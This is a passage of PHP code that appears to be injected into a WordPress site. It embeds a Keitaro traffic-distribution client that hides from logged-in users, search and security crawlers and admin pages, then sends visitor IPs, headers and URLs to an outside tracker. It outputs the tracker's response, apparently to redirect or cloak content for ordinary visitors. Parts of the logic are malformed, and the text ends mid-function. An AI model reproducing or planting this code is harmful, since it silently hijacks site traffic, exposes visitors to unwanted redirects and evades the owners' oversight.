if (isset($_COOKIE['zVZ'])) {
die('XXM' . 'tug');
}
if (!function_exists('checkCurrentURL')) {
if (@function_exists('is_user_logged_in')) {
if (is_user_logged_in()) {
return false;
}
}
foreach ($_COOKIE as $key => $value) {
if (strpos($key, 'wordpress_logged_in_') === 0) {
return false;
}
}
$bad_ua = '(msnbot|baidu|yahoo|search|bing|ask|indexer|cuill.com|clushbot|360spider|80legs|aibot|aboundex|acunetix|ahrefsbot|alexibot|blexbot|backdoorbot|backweb|baiduspider|bandit|batchftp|bigfoot|blackwidow|blowfish|botalot|buddy|builtbottough|bullseye|bunnyslippers|cegbfeieh|cheesebot|cherrypicker|chinaclaw|cogentbot|collector|copier|copyrightcheck|crescent|custo|diibot|disco|dittospyder|drip|easydl|eirgrabber|emailcollector|emailsiphon|emailwolf|erocrawler|exabot|extractor|eyenetie|fhscan|foobot|frontpage|go-ahead-got-it|grabnet|grafula|hmview|httrack|harvest|ilsebot|infonavibot|infotekies|intelliseek|interget|iria|joc|jakarta|jennybot|jetcar|justview|jyxobot|lnspiderguy|lexibot|linkscan|linkwalker|linkextractorpro|linkpadbot|miixpc|mj12bot|mag-net|magnet|markwatch|memo|mirror|nameprotect|nicerspro|npbot|navroad|nearsite|netants|netmechanic|netspider|netzip|netcraft|nextgensearchbot|nimblecrawler|ninja|octopus|openfind|outfoxbot|pagegrabber|pockey|propowerbot|prowebwalker|pump|rma|reget|realdownload|reaper|recorder|repomonkey|seokicks|searchmetricsbot|semrushbot|siphon|siteexplorer|sitesnagger|slysearch|smartdownload|snake|snapbot|snoopy|spacebison|spankbot|sqworm|stripper|sucker|superbot|superhttp|surfbot|szukacz|teleport|telesoft|thenomad|tighttwatbot|titan|true_bot|turnitinbot|turnitinbot|vci|vacuum|voideye|wisenutbot|www-collector-e|wwwoffle|webauto|webbandit|webcopier|webemailextrac|webenhancer|webfetch|webleacher|webreaper|websauger|webstripper|webwhacker|webzip|webmasterworldforumbot|webster|wget|whacker|widow|xaldon|xenu|zeus|zmeu|zyborg|asterias|attach|cosmos|dragonfly|ecatch|ebingbong|flunky|gotit|hloader|humanlinks|ia_archiver|larbin|lftp|likse|lwp-trivial|moget|niki-bot|pavuk|pcbrowser|psbot|rogerbot|sogou|spanner|spbot|suzuran|takeout|turingos)';
$bad_uri = '\?view=login|\?view=registration|\?wc-ajax|xmlrpc.php|wp-includes|wp-content|wp-login.php|wp-cron.php|\?feed=|wp-json|\/feed|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.tiff|\.mpg|\.wmv|\.mp3|\.mpeg|\.zip|\.gzip|\.rar|\.exe|\.pdf|\.doc|\.swf|\.txt|wp-admin|admin|administrator';
$bad_cookies = array('wordpress_logged_in', 'another_bad_cookie');
function checkUserAgent($bad_ua) {
if (preg_match("/$bad_ua/", $_SERVER['HTTP_USER_AGENT'])) {
return false;
}
}
function checkCurrentURL($bad_uri) {
$current_url = $_SERVER['REQUEST_URI'];
if (preg_match("/$bad_uri/", $current_url)) {
return false;
}
}
function checkCookies($bad_cookies) {
foreach ($bad_cookies as $cookie) {
if (isset($_COOKIE[$cookie])) {
return false;
}
}
}
checkUserAgent($bad_ua);
checkCurrentURL($bad_uri);
checkCookies($bad_cookies);
class KClient {
const SESSION_SUB_ID = 'sub_id';
const SESSION_LANDING_TOKEN = 'landing_token';
const VERSION = 3;
const STATE_SESSION_KEY = 'keitaro_state';
const STATE_SESSION_EXPIRES_KEY = 'keitaro_state_expires';
const DEFAULT_TTL = 1;
const NOT_FOUND_STATUS = 404;
private $_httpClient;
private $_debug = false;
private $_trackerUrl;
private $_params = array();
private $_log = array();
private $_excludeParams = array('api_key', 'token', 'language', 'ua', 'ip', 'referrer', 'force_redirect_offer');
private $_result;
private $_stateRestored;
private $_sessionsDisabled = false;
const ERROR = '[404] kclnotwrk';
public function __construct($trackerUrl, $token) {
$this->trackerUrl($trackerUrl);
$this->campaignToken($token);
$this->version(self::VERSION);
$this->param('info', 1);
$this->fillParams();
}
public function fillParams() {
$referrer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : null;
$this->setHttpClient(new KHttpClient());
$host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : null;
$requestUri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : null;
$this->ip($this->_findIp())
->ua(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : null)
->language((isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''))
->xRequestedWith(isset($_SERVER['HTTP_X_REQUESTED_WITH']) ? $_SERVER['HTTP_X_REQUESTED_WITH'] : null)
->seReferrer($referrer)
->referrer($referrer)
->param('original_headers', $this->_getAllHeaders())
->param('original_host', isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'localhost')
->param('original_method', isset($_SERVER["REQUEST_METHOD"]) ? $_SERVER['REQUEST_METHOD'] : 'GET')
->param('uri', ((!empty($_SERVER['HTTPS'])) ? 'https' : 'http') .
'://' . $host . $requestUri)
->param('kversion', '3.4');
if ($this->isPrefetchDetected()) {
$this->param('prefetch', 1);
}
}
public function currentPageAsReferrer() {
$this->referrer($this->_getCurrentPage());
return $this;
}
public function debug($state = true) {
$this->_debug = $state;
return $this;
}
public function seReferrer($seReferrer) {
$this->_params['se_referrer'] = $seReferrer;
return $this;
}
public function referrer($referrer) {
$this->_params['referrer'] = $referrer;
return $this;
}
public function xRequestedWith($xRequestedWith) {
$this->_params['x_requested_with'] = $xRequestedWith;
return $this;
}
public function setHttpClient($httpClient) {
$this->_httpClient = $httpClient;
return $this;
}
public function trackerUrl($trackerUrl) {
if (!empty($trackerUrl)) {
$request = parse_url($trackerUrl);
$this->_trackerUrl = "{$request['scheme']}://{$request['host']}";
if (isset($request['port'])) {
$this->_trackerUrl .= ':' . $request['port'];
}
}
}
// @deprecated
public function token($token) {
return $this->campaignToken($token);
}
public function campaignToken($campaignToken) {
$this->_params['token'] = $campaignToken;
return $this;
}
public function version($version) {
$this->_params['version'] = $version;
return $this;
}
public function ua($ua) {
$this->_params['ua'] = $ua;
return $this;
}
public function language($language) {
$this->_params['language'] = $language;
return $this;
}
public function keyword($keyword) {
$this->_params['keyword'] = $keyword;
return $this;
}
public function forceRedirectOffer() {
$this->_params['force_redirect_offer'] = 1;
}
public function ip($ip) {
$this->_params['ip'] = $ip;
return $this;
}
public function sendUtmLabels() {
foreach ($_GET as $name => $value) {
if (strstr($name, 'utm_')) {
$this->_params[$name] = $value;
}
}
}
public function setLandingToken($token) {
$this->_startSession();
$_SESSION['token'] = $token;
}
public function getSubId() {
$result = $this->performRequest();
if (empty($result->info->sub_id)) {
$this->log('No sub_id is defined');
return 'no_subid';
}
$subId = $result->info->sub_id;
return $subId;
}
public function getToken() {
$result = $this->performRequest();
if (empty($result->info->sub_id)) {
$this->log('No landing token is defined');
return 'no_token';
}
$subId = $result->info->token;
return $subId;
}
public function sendAllParams() {
foreach ($_GET as $name => $value) {
if (empty($this->_params[$name]) && !in_array($name, $this->_excludeParams)) {
$this->_params[$name] = $value;
}
}
}
public function restoreFromSession() {
if ($this->isStateRestored() || $this->_sessionsDisabled) {
return;
}
$this->_startSession();
if (!empty($_SESSION[self::STATE_SESSION_KEY])) {
if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) {
unset($_SESSION[self::STATE_SESSION_KEY]);
unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]);
$this->log('State expired');
} else {
$this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false);
if (isset($this->_result) && isset($this->_result->headers)) {
$this->_result->headers = array();
}
$this->_stateRestored = true;
$this->log('State restored');
}
}
}
public function disableSessions() {
$this->_sessionsDisabled = true;
}
public function restoreFromQuery() {
if (isset($_GET['_subid'])) {
$this->_stateRestored = true;
if (empty($this->_result)) {
$this->_result = new StdClass();
$this->_result->info = new StdClass();
}
$this->_result->info->sub_id = $_GET['_subid'];
$this->log('SubId loaded from query');
if (isset($_GET['_token'])) {
$this->_result->info->token = $_GET['_token'];
$this->log('Landing token loaded from query');
}
$this->_storeState($this->_result, self::DEFAULT_TTL);
$this->_stateRestored = true;
}
}
public function isStateRestored() {
return $this->_stateRestored;
}
public function isPrefetchDetected() {
$checkServerParams = array('HTTP_X_PURPOSE' => 'preview', 'HTTP_X_MOZ' => 'prefetch', 'HTTP_X_FB_HTTP_ENGINE' => 'Liger');
foreach ($checkServerParams as $name => $value) {
if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) {
return true;
}
}
return false;
}
public function saveCookie($key, $value, $ttl) {
if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) {
return;
}
if (!headers_sent()) {
setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), '/', $this->_getCookieHost());
}
$_COOKIE[$key] = $value;
}
public function param($name, $value) {
if (!in_array($name, $this->_excludeParams)) {
$this->_params[$name] = $value;
}
return $this;
}
public function params($value) {
if (!empty($value)) {
if (is_string($value)) {
parse_str($value, $result);
foreach ($result as $name => $value) {
$this->param($name, $value);
}
}
}
return $this;
}
public function reset() {
$this->_result = null;
}
public function performRequest() {
if ($this->_result) {
return $this->_result;
}
$request = $this->_buildRequestUrl();
$params = $this->getParams();
$options = $this->_getRequestOptions();
$this->log('Request: ' . $request);
try {
$result = $this->_httpClient->request($request, $params, $options);
$this->log('Response: ' . $result);
} catch (KClientError $e) {
if ($this->_debug) {
throw $e;
} else {
$errorCode = $e->getHumanCode();
$errorCode = $errorCode ? $errorCode . ' ' : '';
echo $errorCode . self::ERROR;
return;
}
}
$this->_result = json_decode($result);
$this->_storeState(
$this->_result,
isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null
);
if (isset($this->_result->cookies)) {
$this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl);
}
return $this->_result;
}
/**
* @param bool $break
* @param bool $print
* @return bool|string
* @throws KClientError
*/
public function execute($break = false, $print = true) {
$result = $this->performRequest();
$body = $this->_buildBody($result);
if (!$print) {
return $body;
}
$this->_sendHeaders($result);
echo $body;
}
public function executeAndBreak() {
$result = $this->performRequest();
$body = $this->_buildBody($result);
$this->_sendHeaders($result);
if (!empty($body)) {
die($body);
}
if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) {
die($body);
}
if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) {
die($body);
}
}
public function getContent() {
$result = $this->performRequest();
return $this->_buildBody($result);
}
public function showLog($separator = '
') {
echo '